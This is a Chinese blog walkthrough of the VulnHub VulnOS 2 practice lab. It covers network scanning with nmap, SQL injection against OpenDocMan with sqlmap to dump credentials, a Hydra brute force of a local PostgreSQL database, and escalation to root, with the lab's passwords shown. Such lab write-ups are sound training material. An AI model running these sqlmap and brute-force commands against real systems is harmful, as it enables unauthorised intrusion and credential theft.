VulnOS靶场练习详解&安装&必练靶场&渗透靶场练习

本文介绍了如何在VulnOS2.0靶场中进行虚拟机设置,通过Nmap进行端口扫描,识别SQL注入漏洞并利用Hydra工具爆破PostgreSQL数据库,最后实现root权限提升。
摘要由CSDN通过智能技术生成

 下载链接

VulnOS: 2 ~ VulnHubVulnOS: 2, made by c4b3rw0lf. Download & walkthrough links are available.icon-default.png?t=N7T8https://www.vulnhub.com/entry/vulnos-2,147/

安装

该靶场只能在vxbox中导入,网络模式我选择的桥接

新建虚拟机

将类型改为linux

使用现有虚拟硬盘

解决virtualbox选择桥接方式但没有网卡可选的问题_桥接网卡界面名称没有网卡-CSDN博客icon-default.png?t=N7T8https://blog.csdn.net/m0_46622606/article/details/105883502#:~:text=%E6%9F%A5%E7%9C%8B%E7%BD%91%E7%BB%9C%E8%BF%9E%E6%8E%A5%E5%B1%9E%E6%80%A7%E5%BD%93%E4%B8%AD%E6%98%AF%E5%90%A6%E5%AD%98%E5%9C%A8%E2%80%9CVirtualBox%20Bridged%20Networking%20Driver%E2%80%9D%EF%BC%8C%E5%A6%82%E4%B8%8B%E5%9B%BE%E6%89%80%E7%A4%BA%EF%BC%8C%E5%A6%82%E6%9E%9C%E6%B2%A1%E9%80%89%E4%B8%AD%E5%88%99%E9%80%89%E4%B8%AD%E3%80%82,%E5%A6%82%E6%9E%9C%E6%B2%A1%E6%9C%89%E8%AF%A5%E9%A9%B1%E5%8A%A8%EF%BC%8C%E5%88%99%E7%82%B9%E5%87%BB%E2%80%9C%E5%AE%89%E8%A3%85%E2%80%9D%E2%80%93%E2%80%9C%E6%9C%8D%E5%8A%A1%E2%80%9D%E2%80%93%E2%80%9C%E6%B7%BB%E5%8A%A0%E2%80%9D%E2%80%93%E2%80%9C%E4%BB%8E%E7%A3%81%E7%9B%98%E5%AE%89%E8%A3%85%E2%80%9D%E2%80%93%E2%80%9C%E6%B5%8F%E8%A7%88%E2%80%9D%20%E6%89%BE%E5%88%B0virtualbox%E5%AE%89%E8%A3%85%E7%9B%AE%E5%BD%95%E4%B8%8B%E7%9A%84%E8%BF%99%E4%B8%AA%E8%B7%AF%E5%BE%84%20%E9%80%89%E6%8B%A9VBoxNetLwf.inf%EF%BC%8C%E8%BF%9B%E8%A1%8C%E5%AE%89%E8%A3%85%E3%80%82%20%E5%86%8D%E8%BF%94%E5%9B%9Evirtualbox%E4%B8%AD%E9%80%89%E6%8B%A9%E6%A1%A5%E6%8E%A5%E7%BD%91%E5%8D%A1%EF%BC%8C%E5%8D%B3%E5%8F%AF%E9%80%89%E6%8B%A9%E5%AF%B9%E5%BA%94%E7%9A%84%E7%95%8C%E9%9D%A2%E5%90%8D%E7%A7%B0%E3%80%82

正文:

先用nmap扫描靶机ip

nmap -sn 192.168.1.1/24

获取到靶机ip后,对靶机的端口进行扫描,并把结果输出到VulnOS文件夹下,命名为port方便后续查看

nmap -p- 192.168.1.3 -r -PN -A -oA VulnOS/port

(-p-:对所有端口进行探测

   -PN:用于禁用主机发现。这些参数告诉Nmap不要执行主机存活检测,而是直接扫描指定的目标

    -oA:输出到指定位置

     -r:连续扫描端口,并在扫描过程中随机排序目标端口。这可以帮助减少被网络防御系统检测到的风险。

对端口指纹进行详细探测,并把结果输出到VulnOS文件夹下,命名为server方便后续查看

nmap -p 22,80,6667 192.168.1.3 -sC -sV -r -O --version-all -A -oA VulnOS/server

 (-p:对指定的端口进行探测

   -sV:版本信息

   -sC:默认脚本扫描

    -A:启动Os检测,版本检测,脚本扫描和traceroute

   -O:探测操作系统信息

   --version-all:尽可能多的探测信息

访问80端口

根据页面提示,打开红色字体的链接

并没有什么动西,但是发现作者老六在Documentation页面,留下了黑色字体信息

根据页面提示,我们找到了登录页面以及账号密码 guest/guest

百度搜索OpenDocMan

获取shell

我们在kali中搜索相关漏洞(searchsploit是一个非常实用的网络安全工具,它是Exploit-DB的一个命令行搜索工具。Exploit-DB是一个公开的漏洞数据库,包含了大量的漏洞利用程序)

searchsploit opendocman 1.2.7

发现相关漏洞文件

将该漏洞文件复制到当前目录下

searchsploit opendocman 1.2.7 -m 32075.txt

读取该文件,我们得到了payload

cat 32075.txt

既然他是sql注入,那直接放到sqlmap中进行尝试

python sqlmap.py -u "http://192.168.1.3/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --batch --level 3 --dbs

​python sqlmap.py -u "http://192.168.1.3/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --batch --level 3 -D jabcd0cs --tables

python sqlmap.py -u "http://192.168.1.3/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --batch --level 3 -D jabcd0cs -T odm_user --dump

得到账号webmin  密码webmin1980

进行ssh尝试登录

如果出现该提示,则

vi ~/.ssh/known_hosts

将该文件中对应的靶场ip数据删除即可,如若不知道,则全部删除

ssh webmin@192.168.1.3

登录成功

提权

我们在当前目录下发现一个压缩文件

将其进行解压

tar -xzvf post.tar.gz

到解压文件夹下

cd post

发现是暴力破解工具——hydra源码,并且发现有个这个文件,看来是按时我们爆破该数据库啊(postgresql是一款数据库工具)

我们对该源码进行编译

make

提示我们编译前先运行./configure,然后再进行安装

./configure

make

查看是否成功安装

./hydra

安装成功,但是该靶场没有字典,我们回到kali中,打开http服务,将字典下载过来

在kali的 

/usr/share/wordlists/metasploit/

  路径下有  postgres_default_user.txt 以及 postgres_default_pass.txt字典文件

我们在当前路径下打开http服务

python3 -m http.server 8888

回到靶机shell中,回到初始目录

将两个字典下载过来

wget http://192.168.1.35:8888/postgres_default_user.txt
​wget http://192.168.1.35:8888/postgres_default_pass.txt

并将文件重新命名,方便使用(名字太长了)

mv postgres_default_pass.txt pass.txt
mv postgres_default_user.txt user.txt

运行post目录下hydra工具

./post/hydra

可以看到该工具可以直接爆破该数据库

利用字典进行爆破尝试

./post/hydra -L user.txt -P pass.txt postgres://127.0.0.1

爆破出该数据库的账号密码

postgres:postgres

对该数据库进行登录

psql -h 127.0.0.1 -U postgres

登录成功,(postgresql数据库可以看看这篇文档5432,5433 - 渗透测试 Postgresql - HackTricks

\l #查看所有数据库

\c #指定数据库
\c system

\d #列出表

查看users表内容

select * from users;

如果出现敲入命令没反应,就在后面加上分号,报错后再次进行输入(别忘了分号!)

ok

我们获取到了另一个账号密码

vulnosadmin:c4nuh4ckm3tw1c3

再次尝试登录

ssh vulnosadmin@192.168.1.3

我们发现在该用户目录下有个blend文件

经过查询,该文件为3D 建模应用程序 Blender 的原生 3D 图形文件格式

我们将该文件下载到当前目录下

scp vulnosadmin@192.168.1.3:~/r00t.blend ./

安装blend进行查看该文件

我们隐藏掉图形后,发现在该文件中央藏着一个密码 

ab12fg//drg

我们回到靶场shell

su root

输入密码

ab12fg//drg

登陆root账号成功!

  • 17
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值